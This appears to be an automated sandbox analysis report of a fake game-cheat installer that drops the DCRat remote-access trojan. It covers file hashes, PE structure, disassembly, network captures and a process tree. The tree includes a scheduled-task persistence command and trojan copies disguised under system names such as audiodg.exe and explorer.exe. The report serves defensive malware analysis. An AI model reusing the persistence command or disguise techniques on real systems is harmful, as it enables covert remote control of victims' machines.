                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1175040
                                Entropy (8bit):6.397948456227505
                                Encrypted:false
                                SSDEEP:24576:WEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyx:bdmbjTKlD00R
                                MD5:129B8E200A6E90E813080C9CE0474063
                                SHA1:B5352CDAE50E5DDF3EB62F75F2E77042386B8841
                                SHA-256:CF0018AFFDD0B7921F922F1741AD229EC52C8A7D6C2B19889A149E0CC24AA839
                                SHA-512:10949E7F0B6DD55E0A5D97E4531EF61427920CCCC2136C0DD3607CDC79AFA0D8A7178965A07039948DA97F0200EAD8FE5A54921620C943C7FC76DD5EF5A7C841
                                Malicious:true
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..........................................@..............................................@..............................,8... ..............................................................................|................................text...$........................... ..`.itext.. ........................... ..`.data...<0.......2..................@....bss.....a...P...........................idata..,8.......:..................@....tls....<............X...................rdata...............X..............@..@.rsrc........ .......Z..............@..@....................................@..@........................................................................................................................................

                                C:\Windows\Fonts\4f78d385fc35a0

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (463), with no line terminators
                                Category:dropped
                                Size (bytes):463
                                Entropy (8bit):5.866410671392798
                                Encrypted:false
                                SSDEEP:12:qVbxPd5JfUKpJRSCrXwMA4Tkx+VsK9UD3aoYp0Qf03x/aQBXh:wj5Jfh7zDwMA09VsK8qdeM03UQBx
                                MD5:B07E3EE93C8BBE7A55F377829BD43F13
                                SHA1:9C7142B8F33019DA44C2454D6AAC2EA5DF7BD600
                                SHA-256:E8E1788B1BD589F52F24310DEA095232C4BE097293ADBDDC6F546BE2CC43D67D
                                SHA-512:391C60F7036C685D8C75992170EABEDE99715E759D187BA6A78B312486331BA6F1B01FF44E23BC275B5969FDE98705BA93448DDEDA07C4835D0AFE6BD8352A5F
                                Malicious:false
                                Preview:Rhhvv1VmMqu25WhqBV5brZZiHQ3KlHoVI1xUkmwDsnHhR2KIi9yfVSv1I9ne7KBFBZtDiNGYi2tDS2QPGvmlSJA0F5Mk9RFhmBf2JGjV3Z6cjrjPtYYMhZw2Z38nAfZRwLbQWYFALRs2MhQYV61k339NOndPI6UYApqYQT2USYAQr4p1mjREozY3LNBt501P7U2h12HCDgRe2tgU7lmioPtKQxMCSIZcgvTWBHAucPAHh3AbrqwTNTkrksQEpEt4Hy7HaJT0k2GZOmmXwuUlWFPNLmwT06EXfF9s52BiX6sVNKc7F3R4uIiBju6xW99oxs3Im4c4twNaX3AAJzO7pJnWh8JL6NMY6EheQTULbWL75Inpt5ohvC8oEhlouQ7fjydTWft0eDfS7paZUdbBjpm4F2atrqaKZqYGpUSNLxCsgqqYGMTRy654MiNdFAIxmV3RRTt9KOzwm4Y

                                C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Windows\addins\42af1c969fbb7b

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (386), with no line terminators
                                Category:dropped
                                Size (bytes):386
                                Entropy (8bit):5.84628637676446
                                Encrypted:false
                                SSDEEP:12:5P79wiL6xv4hWxZjjj2NW9CZ83WD9oPz7:Z76yGjj2gA8GD9oP3
                                MD5:842B0A1A2DEDBF6C5B14553F22BB9884
                                SHA1:8934AA1F79E39CA016150363BDB0DC4999AAA7C4
                                SHA-256:3D4443FD7A9C565CB1FCAAC80F407A8B49545828A69997FE465D25E7015CC49A
                                SHA-512:D7822FCF930167C07B260E1DDF43DA40DFF43336D89CD86C6534421478B8A4616D2225DB0442CBECAB5E3DBCDE3E8C422512F8F3C5BBB3D0E71C518A86C4E48D
                                Malicious:false
                                Preview:OupjXQXJvAmS5bl7Okg8zHkTiwHgxgSeRcOnrnVsBXwN6brsnntTegiHKVBlI0VOrIAdN8QkPx7cVWXGEZ2Kx99v4HdVmujKBhfyaOepWJEqiGvx84hs8LbrIPjFf58fOwax1jqz5Nxn5TMxWqXrN0MzGxqLpZJbKjcwp85YOrxuYxwyCvtzhRRXkkqD2fKfDVdW1aIYu8dfCbbTB1I4pU43REMER2gshRrCUa7mmVEixwUIJXCBWP0sbjFwNEH1cu8vuZ8k4fRUPVGeuD530eWRb8luVKYiOMFCyjYtYbG17gcFdkCKINB7YqTwyOPuGtFDQDqLpLeYYfU5ffQuIOZAKHoIPl5KLWuOaZza31e7tnj2WYQS7fm2TE2IYi5DQU

                                C:\Windows\addins\audiodg.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Windows\en-US\4f78d385fc35a0

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (401), with no line terminators
                                Category:dropped
                                Size (bytes):401
                                Entropy (8bit):5.8377022771564056
                                Encrypted:false
                                SSDEEP:12:SMUf3NtAdM4iojEI23HdanwuQ/avwQpBzkdtE:RI3NWu4ioD234vQynpv
                                MD5:20985845A5DC826CE82007A959978A8D
                                SHA1:1C7A0DAA785B7FB8319B49D2EBA828858ED9C69E
                                SHA-256:CDED0FEBB35688EE1223907088ABC118C6FAAB849D979FE7619538EF1B1447FA
                                SHA-512:C4D2F511F0746082E718A594F06A52322088678AEC775382EBAF3D6188A5D28DB754A74A6173EFD186B1F097FBB9D8828B15A6742E24A7DB7515DB520EA5C59F
                                Malicious:false
                                Preview:WdPNASXSioI5GlbTAkABDtFxmulxUmaxH3QmVIEUPoYWWp34qDzyP3VmXblPrj76OVyNVy82gpwYUsb61qHRxlhNioP3gympqcIA1qj1E6RkH6Sp9pYAcqImxkoqjFWsCGr1jaFLHQM0U7GmWj31ZmNATgNQB2R9kjhAOaFjjN3LdRSzeCU9LeSa3rhDNzJO8NQuaFX5eURMtBhCOXv9hRxFQGGh2BWuDoNPBhZYoZf1NFr2JfzzDKrqaKeT80Dd8hJEySAq8XUIw62KZOYWLhq26gy0CFZyVB3p6mD0fI0q0i3eST4ucrRb1QHRdKn27gwvCNNwKh1Cq9CYmUhtLpVoubxqewWVf7tTvIbFFHj4zOu1NtoJm4rRKIAkZhRYKfhtQtmd3coDGbyfr

                                C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9946318426841465
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.91%
                                • Win32 Executable (generic) a (10002005/4) 49.86%
                                • InstallShield setup (43055/19) 0.21%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:uChcvn3L6R.exe
                                File size:48'732'160 bytes
                                MD5:236b78f3cd3a0b771d318f044dda8f45
                                SHA1:f890ca2ffb6218fa01df6844fe2a51b184e912b8
                                SHA256:8342c29aacd500b5d424822648331736379f18bdb6bc27a7e7a579544570fa8a
                                SHA512:8c6f2131f7566d64a5a8973cf4a3bad7d733e02d098326f30ec4f88785237c26d7361acfc674de084997356d2bb082ea8ec14b7ac4485fa63102b40c2dcb3d1e
                                SSDEEP:786432:uNu/WmUoEqtPbDiTr+LykgDYGUvqptKaQ393283Ka3rPJHE2NOAsh8bOC:vUoEqtfiTAIldpt435x3rjs2qC
                                TLSH:43B733027E418961F41A0933C2FF99144B71A8A12BE5F3177EFAB7AD55223932C2D6C7
                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x4020cc
                                Entrypoint Section:CODE
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                DLL Characteristics:
                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:d59a4a699610169663a929d37c90be43

                                Entrypoint Preview

                                Instruction
                                push ebp
                                mov ebp, esp
                                mov ecx, 0000000Ch
                                push 00000000h
                                push 00000000h
                                dec ecx
                                jne 00007F76F4F996ABh
                                push ecx
                                push ebx
                                push esi
                                push edi
                                mov eax, 0040209Ch
                                call 00007F76F4F99120h
                                xor eax, eax
                                push ebp
                                push 00402361h
                                push dword ptr fs:[eax]
                                mov dword ptr fs:[eax], esp
                                lea edx, dword ptr [ebp-14h]
                                mov eax, 00402378h
                                call 00007F76F4F994F9h
                                mov eax, dword ptr [ebp-14h]
                                call 00007F76F4F995C9h
                                mov edi, eax
                                test edi, edi
                                jng 00007F76F4F998E6h
                                mov ebx, 00000001h
                                lea edx, dword ptr [ebp-20h]
                                mov eax, ebx
                                call 00007F76F4F99588h
                                mov ecx, dword ptr [ebp-20h]
                                lea eax, dword ptr [ebp-1Ch]
                                mov edx, 00402384h
                                call 00007F76F4F98D18h
                                mov eax, dword ptr [ebp-1Ch]
                                lea edx, dword ptr [ebp-18h]
                                call 00007F76F4F994BDh
                                mov edx, dword ptr [ebp-18h]
                                mov eax, 00404680h
                                call 00007F76F4F98BF0h
                                lea edx, dword ptr [ebp-2Ch]
                                mov eax, ebx
                                call 00007F76F4F99556h
                                mov ecx, dword ptr [ebp-2Ch]
                                lea eax, dword ptr [ebp-28h]
                                mov edx, 00402390h
                                call 00007F76F4F98CE6h
                                mov eax, dword ptr [ebp-28h]
                                lea edx, dword ptr [ebp-24h]
                                call 00007F76F4F9948Bh
                                mov edx, dword ptr [ebp-24h]
                                mov eax, 00404684h
                                call 00007F76F4F98BBEh
                                lea edx, dword ptr [ebp-38h]
                                mov eax, ebx
                                call 00007F76F4F99524h
                                mov ecx, dword ptr [ebp-38h]
                                lea eax, dword ptr [ebp-34h]
                                mov edx, 0040239Ch

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x2e774ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                .rsrc0x90000x2e774ac0x2e776000a451b2d8dc756603d439b9513bc7be8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_RCDATA0x92940x2cc68d5PE32 executable (GUI) Intel 80386, for MS Windows0.9314765930175781
                                RT_RCDATA0x2ccfb6c0x1b08baPE32 executable (GUI) Intel 80386, for MS Windows0.4997720718383789
                                RT_RCDATA0x2e804280x15ASCII text, with no line terminators1.380952380952381
                                RT_RCDATA0x2e804400x10ASCII text, with no line terminators1.5
                                RT_RCDATA0x2e804500x1very short file (no magic)9.0
                                RT_RCDATA0x2e804540x1very short file (no magic)9.0
                                RT_RCDATA0x2e804580x1very short file (no magic)9.0
                                RT_RCDATA0x2e8045c0x1very short file (no magic)9.0
                                RT_RCDATA0x2e804600x10data1.5
                                RT_RCDATA0x2e804700x1very short file (no magic)9.0
                                RT_RCDATA0x2e804740x38data1.0714285714285714

                                Imports

                                DLLImport
                                kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                shfolder.dllSHGetFolderPathA
                                shell32.dllShellExecuteA

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/26/24-10:04:29.664888TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M48049738104.21.22.205192.168.2.4

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 26, 2024 10:02:11.392616987 CEST4973080192.168.2.4208.95.112.1
                                May 26, 2024 10:02:11.400430918 CEST8049730208.95.112.1192.168.2.4
                                May 26, 2024 10:02:11.400608063 CEST4973080192.168.2.4208.95.112.1
                                May 26, 2024 10:02:11.402102947 CEST4973080192.168.2.4208.95.112.1
                                May 26, 2024 10:02:11.457113028 CEST8049730208.95.112.1192.168.2.4
                                May 26, 2024 10:02:11.880366087 CEST8049730208.95.112.1192.168.2.4
                                May 26, 2024 10:02:11.927656889 CEST4973080192.168.2.4208.95.112.1
                                May 26, 2024 10:02:15.136179924 CEST4973080192.168.2.4208.95.112.1
                                May 26, 2024 10:02:19.201643944 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:02:19.206954956 CEST8049731208.95.112.1192.168.2.4
                                May 26, 2024 10:02:19.207087994 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:02:19.207380056 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:02:19.264252901 CEST8049731208.95.112.1192.168.2.4
                                May 26, 2024 10:02:19.691047907 CEST8049731208.95.112.1192.168.2.4
                                May 26, 2024 10:02:19.755702972 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:03:20.755343914 CEST8049731208.95.112.1192.168.2.4
                                May 26, 2024 10:03:20.755716085 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:03:59.702544928 CEST4973180192.168.2.4208.95.112.1
                                May 26, 2024 10:03:59.712030888 CEST8049731208.95.112.1192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 26, 2024 10:02:11.367506981 CEST5360953192.168.2.41.1.1.1
                                May 26, 2024 10:02:11.383781910 CEST53536091.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 26, 2024 10:02:11.367506981 CEST192.168.2.41.1.1.10x2907Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 26, 2024 10:02:11.383781910 CEST1.1.1.1192.168.2.40x2907No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • ip-api.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730208.95.112.1806456C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                TimestampBytes transferredDirectionData
                                May 26, 2024 10:02:11.402102947 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                May 26, 2024 10:02:11.880366087 CEST175INHTTP/1.1 200 OK
                                Date: Sun, 26 May 2024 08:02:11 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 60
                                X-Rl: 44
                                Data Raw: 66 61 6c 73 65 0a
                                Data Ascii: false


                                Session IDSource IPSource PortDestination IPDestination Port
                                1192.168.2.449731208.95.112.180
                                TimestampBytes transferredDirectionData
                                May 26, 2024 10:02:19.207380056 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                May 26, 2024 10:02:19.691047907 CEST175INHTTP/1.1 200 OK
                                Date: Sun, 26 May 2024 08:02:18 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 52
                                X-Rl: 43
                                Data Raw: 66 61 6c 73 65 0a
                                Data Ascii: false


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:04:01:59
                                Start date:26/05/2024
                                Path:C:\Users\user\Desktop\uChcvn3L6R.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\uChcvn3L6R.exe"
                                Imagebase:0x400000
                                File size:48'732'160 bytes
                                MD5 hash:236B78F3CD3A0B771D318F044DDA8F45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:04:02:04
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
                                Imagebase:0x400000
                                File size:46'950'613 bytes
                                MD5 hash:81E98D594505E0008D35FF1E1D2E4E41
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:2
                                Start time:04:02:05
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
                                Imagebase:0x400000
                                File size:1'175'040 bytes
                                MD5 hash:129B8E200A6E90E813080C9CE0474063
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:3
                                Start time:04:02:06
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe"
                                Imagebase:0x820000
                                File size:1'771'706 bytes
                                MD5 hash:593631A643AA6AB0AF08189773812E6D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:4
                                Start time:04:02:06
                                Start date:26/05/2024
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe"
                                Imagebase:0x170000
                                File size:147'456 bytes
                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:5
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                Imagebase:0x570000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:32
                                Start time:04:02:11
                                Start date:26/05/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:35
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\addins\audiodg.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\addins\audiodg.exe
                                Imagebase:0xf00000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:38
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\addins\audiodg.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\addins\audiodg.exe
                                Imagebase:0x20000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:40
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Recovery\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Recovery\explorer.exe
                                Imagebase:0x6f0000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
